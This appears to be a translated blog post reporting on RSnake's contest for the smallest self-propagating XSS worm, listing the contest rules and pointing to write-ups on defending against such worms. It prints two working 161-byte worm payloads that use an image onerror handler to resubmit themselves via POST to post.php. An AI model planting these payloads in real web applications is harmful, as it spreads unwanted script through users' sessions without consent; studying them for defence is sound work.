XSS worm: who is less?

I stumbled upon the news about the contest the other day, in which they propose to create a minimal JavaScript code that will copy itself further. The author of the competition is Robert Hansen aka RSnake , a fairly large information security specialist.

Conditions

Under the terms of the contest, the code required the following:

1. Must be UTF-8 or ISO-8859-1 encoded.
2. Must copy itself by a POST request to the post.php page of the same domain from which it starts (no GETs). The text parameter should be content . We can assume that post.php will unescape your code accordingly.
3. It should not grow in size during distribution (if the code starts with n bytes, it should not increase in the next step to n + x). Those. we assume that the content will be ignored by the post.php script if it is more than n bytes.
4. Must run in written form (we can add all other parameters for the corresponding injection later)
5. Should not use cookies or GET parameters of the query string (all lines of code will remain only on the page itself as an active XSS).
6. Should not assume any information about the DOM tree, although you can use class or id if it is in the worm code itself. You can not use the search n-th script on the page, because this information may vary from site to site.
7. Should work at least in Internet Explorer 7.0 and Firefox 2.x.
8. Must issue XSS as a message on the page (as a “payload”).
9. It should work, at least, on Apache 1.3+ and Apache 2+ servers (i.e. not use any server-dependent things related to other servers) due to their dominance in the market.
10. Should work without user participation or with minimal participation that occurs on each page (for example, a mouseover in an arbitrary place on the page).

')

Holding

The competition began on January 4 and ended 10. The author received several hundred options, but only two of them were minimal and worked under all the stated conditions:

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+
innerHTML.slice(action=(method='post')+'.php',155)))">

and

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value=
'<form>'+innerHTML.slice(alert('XSS'),155))">

The length of the worms: 161 bytes . As can be seen from the code, the options are very similar, if not to say identical, practically, character-by-character. The full conclusion of the competition .

Results

On the basis of the results obtained, RSnake published a small note in which it tries to summarize how one can defend against such worms (after all, the minimal code will have some common signatures in order to work most efficiently).

The author also published a large article on the problem of XSS-worms in general, which states that it is very difficult to deal with them, but it is possible. The article is somewhat long, but very interesting.

Related Links

• RSnake aka Robert Hansen
• Competition conditions for the smallest XSS-worm
• Contest results
• Results of the miniature worms competition
• XSS worms: analysis and protection

Thanks for attention. I would be happy to comment.

Web Optimizator: checking the speed of loading sites